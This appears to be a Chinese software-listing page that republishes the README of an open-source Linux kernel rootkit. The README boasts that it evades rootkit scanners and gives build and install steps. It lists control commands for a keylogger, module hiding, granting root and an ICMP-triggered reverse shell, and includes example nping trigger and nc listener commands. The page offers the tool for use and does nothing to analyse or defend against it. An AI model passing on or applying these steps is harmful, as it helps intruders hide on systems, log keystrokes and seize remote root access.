• 设为首页
  • 点击收藏
  • 手机版
    手机扫一扫访问
    迪恩网络手机版
  • 关注官方公众号
    微信扫一扫关注
    公众号

maK-/maK_it-Linux-Rootkit: This is a linux rootkit using many of the techniques ...

原作者: [db:作者] 来自: 网络 收藏 邀请

开源软件名称(OpenSource Name):

maK-/maK_it-Linux-Rootkit

开源软件地址(OpenSource Url):

https://github.com/maK-/maK_it-Linux-Rootkit

开源编程语言(OpenSource Language):

C 87.5%

开源软件介绍(OpenSource Introduction):

maK_it-Linux-Rootkit

========================

This is a simple rootkit implementation for the project described at the following location

https://web.archive.org/web/20190119045332/https://r00tkit.me/

This rootkit avoids both the chkrootkit & rkhunter scanners as intended.

It is fully compatible with the latest version of CentOS 6.5

To run simply run "make" in the folder with the Makefile.

install with insmod maK_it.ko

Remove with rmmod maK_it

=============== Demo Commands

Echo any of the following into /dev/.maK_it

debug - turn /var/log/messages debug messages on or off.

keyLogOn - turn the keylogger on

keyLogOff - turn the keylogger off

modHide - hide the module (hidden by default in insmod)

modReveal - reveal the module (so you can rmmod it)

rootMe - give root privileges to user

shellUp - Turn on a packet sniffer for reverse shell icmp

shellDown - Turn off the packet sniffer daemon

To trigger the reverse shell, listen on a port of your choice on your own machine. The shell will be returned if you send an icmp packet with the right trigger word, your ip/port.

Example: nping --icmp -c 1 -dest-ip 127.0.0.1 --data-string 'maK_it_$H3LL 127.0.0.1 31337'

A port listener can be simply opened on your machine using nc -l 31337




鲜花

握手

雷人

路过

鸡蛋
该文章已有0人参与评论

请发表评论

全部评论

专题导读
上一篇:
techarkit/Linux-For-Beginners: A Red Hat Certified System Administrator (RHCSA) ...发布时间:2022-08-15
下一篇:
Donivr/Linux-PDF发布时间:2022-08-15
热门推荐
阅读排行榜

扫描微信二维码

查看手机版网站

随时了解更新最新资讯

139-2527-9053

在线客服(服务时间 9:00~18:00)

在线QQ客服
地址:深圳市南山区西丽大学城创智工业园
电邮:jeky_zhao#qq.com
移动电话:139-2527-9053

Powered by 互联科技 X3.4© 2001-2213 极客世界.|Sitemap